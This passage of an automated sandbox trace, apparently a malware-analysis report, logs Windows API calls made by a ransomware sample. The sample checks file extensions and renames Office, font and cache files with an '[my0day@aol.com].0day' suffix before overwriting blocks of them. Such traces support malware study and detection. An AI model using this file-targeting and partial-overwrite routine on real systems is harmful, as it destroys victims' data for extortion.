Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll")) returned 0x20 [0057.834] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0057.834] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0057.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0057.835] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0x0) returned 1 [0057.835] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0057.835] ReadFile (hFile=0x1c4, lpBuffer=0x3c80058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0) Thread: id = 18 os_tid = 0xad8 [0032.939] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x37b0f88 [0032.940] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x37c0f90 [0032.940] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640428 [0032.940] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x6430e8 [0032.940] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640440 [0032.940] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x100000) returned 0x3d90020 [0032.940] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640458 [0032.940] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x640458, Size=0x20) returned 0x37203a8 [0032.940] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640458 [0032.940] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x640458, Size=0x20) returned 0x3720380 [0032.941] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.941] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.941] Wow64DisableWow64FsRedirection (in: OldValue=0x370ff58 | out: OldValue=0x370ff58*=0x0) returned 1 [0032.941] lstrlenW (lpString="kernel32.dll") returned 12 [0032.941] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37203a8 | out: hHeap=0x5f0000) returned 1 [0032.941] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.941] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3720380 | out: hHeap=0x5f0000) returned 1 [0032.941] Sleep (dwMilliseconds=0x64) [0033.102] lstrcmpiW (lpString1=".ttf", lpString2=".0day") returned 1 [0033.136] lstrlenW (lpString="cht_boot.ttf") returned 12 [0033.136] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0033.991] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=3876772) returned 1 [0033.991] CloseHandle (hObject=0x190) returned 1 [0033.991] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf")) returned 0x20 [0033.991] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.991] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0033.991] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0033.991] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0033.991] lstrlenW (lpString=".doc") returned 4 [0033.991] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0033.991] lstrlenW (lpString=".docx") returned 5 [0033.991] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0033.991] lstrlenW (lpString=".pdf") returned 4 [0033.991] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0033.992] lstrlenW (lpString=".xls") returned 4 [0033.992] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0033.992] lstrlenW (lpString=".xlsx") returned 5 [0033.992] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0033.992] lstrlenW (lpString=".ppt") returned 4 [0033.992] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0033.992] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0033.992] lstrlenW (lpString=".zip") returned 4 [0033.992] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0033.992] lstrlenW (lpString=".rar") returned 4 [0033.992] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0033.992] lstrlenW (lpString=".bz2") returned 4 [0033.992] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0033.992] lstrlenW (lpString=".7z") returned 3 [0033.992] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0033.992] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0033.992] lstrlenW (lpString=".dbf") returned 4 [0033.992] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0033.992] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0033.992] lstrlenW (lpString=".1cd") returned 4 [0033.992] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0033.992] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0033.992] lstrlenW (lpString=".jpg") returned 4 [0033.992] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0033.992] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0033.992] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0033.992] lstrlenW (lpString=".doc") returned 4 [0033.992] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0033.992] lstrlenW (lpString=".docx") returned 5 [0033.992] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0033.992] lstrlenW (lpString=".pdf") returned 4 [0033.992] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0033.992] lstrlenW (lpString=".xls") returned 4 [0033.992] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0033.993] lstrlenW (lpString=".xlsx") returned 5 [0033.993] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0033.993] lstrlenW (lpString=".ppt") returned 4 [0033.993] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0033.993] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0033.993] lstrlenW (lpString=".zip") returned 4 [0033.993] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0033.993] lstrlenW (lpString=".rar") returned 4 [0033.993] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0033.993] lstrlenW (lpString=".bz2") returned 4 [0033.993] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0033.993] lstrlenW (lpString=".7z") returned 3 [0033.993] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0033.993] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0033.993] lstrlenW (lpString=".dbf") returned 4 [0033.993] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0033.993] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0033.993] lstrlenW (lpString=".1cd") returned 4 [0033.993] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0033.993] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26 [0033.993] lstrlenW (lpString=".jpg") returned 4 [0033.993] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0033.993] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0033.993] lstrlenW (lpString="PptLR.cab") returned 9 [0033.993] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0034.317] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=70361744) returned 1 [0034.317] CloseHandle (hObject=0x184) returned 1 [0034.317] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab")) returned 0x2020 [0034.317] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.317] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0034.318] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0034.318] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0x0) returned 1 [0034.318] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0034.318] ReadFile (in: hFile=0x184, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0034.327] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x165e0da, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0034.327] ReadFile (in: hFile=0x184, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0034.334] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0034.334] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x42da290, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0034.334] ReadFile (in: hFile=0x184, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0034.352] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.352] WriteFile (in: hFile=0x184, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x370fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0034.545] SetEndOfFile (hFile=0x184) returned 1 [0034.545] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ef2078 [0034.548] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0034.549] WriteFile (in: hFile=0x184, lpBuffer=0x3ef2078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef2078*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.583] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x165e0da, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0034.583] WriteFile (in: hFile=0x184, lpBuffer=0x3ef2078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef2078*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.584] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x42da290, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0034.584] WriteFile (in: hFile=0x184, lpBuffer=0x3ef2078*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef2078*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.586] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ef2078 | out: hHeap=0x5f0000) returned 1 [0034.586] CloseHandle (hObject=0x184) returned 1 [0036.928] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0036.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0036.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0036.929] lstrlenW (lpString=".doc") returned 4 [0036.929] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0036.929] lstrlenW (lpString=".docx") returned 5 [0036.929] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0036.929] lstrlenW (lpString=".pdf") returned 4 [0036.929] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0036.929] lstrlenW (lpString=".xls") returned 4 [0036.929] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0036.929] lstrlenW (lpString=".xlsx") returned 5 [0036.929] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0036.929] lstrlenW (lpString=".ppt") returned 4 [0036.929] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0036.929] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0036.929] lstrlenW (lpString=".zip") returned 4 [0036.929] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0036.929] lstrlenW (lpString=".rar") returned 4 [0036.929] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0036.929] lstrlenW (lpString=".bz2") returned 4 [0036.929] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0036.929] lstrlenW (lpString=".7z") returned 3 [0036.929] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0036.929] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0036.929] lstrlenW (lpString=".dbf") returned 4 [0036.929] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0036.929] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0036.929] lstrlenW (lpString=".1cd") returned 4 [0036.929] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0036.929] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0036.929] lstrlenW (lpString=".jpg") returned 4 [0036.929] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0036.929] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0036.929] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0036.929] lstrlenW (lpString=".doc") returned 4 [0036.930] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0036.930] lstrlenW (lpString=".docx") returned 5 [0036.930] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0036.930] lstrlenW (lpString=".pdf") returned 4 [0036.930] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0036.930] lstrlenW (lpString=".xls") returned 4 [0036.930] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0036.930] lstrlenW (lpString=".xlsx") returned 5 [0036.930] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0036.930] lstrlenW (lpString=".ppt") returned 4 [0036.930] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0036.930] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0036.930] lstrlenW (lpString=".zip") returned 4 [0036.930] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0036.930] lstrlenW (lpString=".rar") returned 4 [0036.930] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0036.930] lstrlenW (lpString=".bz2") returned 4 [0036.930] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0036.930] lstrlenW (lpString=".7z") returned 3 [0036.930] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0036.930] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0036.930] lstrlenW (lpString=".dbf") returned 4 [0036.930] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0036.930] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0036.930] lstrlenW (lpString=".1cd") returned 4 [0036.930] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0036.930] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0036.930] lstrlenW (lpString=".jpg") returned 4 [0036.930] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0036.930] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0036.930] lstrlenW (lpString="WordLR.cab") returned 10 [0036.931] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0036.931] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=43806141) returned 1 [0036.931] CloseHandle (hObject=0x1a8) returned 1 [0036.931] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab")) returned 0x2020 [0036.931] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0036.931] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0036.931] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0036.932] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0x0) returned 1 [0036.932] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.932] ReadFile (in: hFile=0x1a8, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.941] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xdecf3f, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.941] ReadFile (in: hFile=0x1a8, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.946] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0036.946] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x2986dbd, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.946] ReadFile (in: hFile=0x1a8, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.036] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.036] WriteFile (in: hFile=0x1a8, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x370fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0037.573] SetEndOfFile (hFile=0x1a8) returned 1 [0037.573] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3f7a0a8 [0037.573] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.573] WriteFile (in: hFile=0x1a8, lpBuffer=0x3f7a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f7a0a8*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.574] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xdecf3f, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.574] WriteFile (in: hFile=0x1a8, lpBuffer=0x3f7a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f7a0a8*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.576] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x2986dbd, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.576] WriteFile (in: hFile=0x1a8, lpBuffer=0x3f7a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f7a0a8*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.578] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f7a0a8 | out: hHeap=0x5f0000) returned 1 [0037.578] CloseHandle (hObject=0x1a8) returned 1 [0039.529] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0039.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.530] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 73 [0039.530] lstrlenW (lpString=".doc") returned 4 [0039.530] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0039.530] lstrlenW (lpString=".docx") returned 5 [0039.530] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0039.530] lstrlenW (lpString=".pdf") returned 4 [0039.530] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0039.530] lstrlenW (lpString=".xls") returned 4 [0039.530] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0039.530] lstrlenW (lpString=".xlsx") returned 5 [0039.530] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0039.530] lstrlenW (lpString=".ppt") returned 4 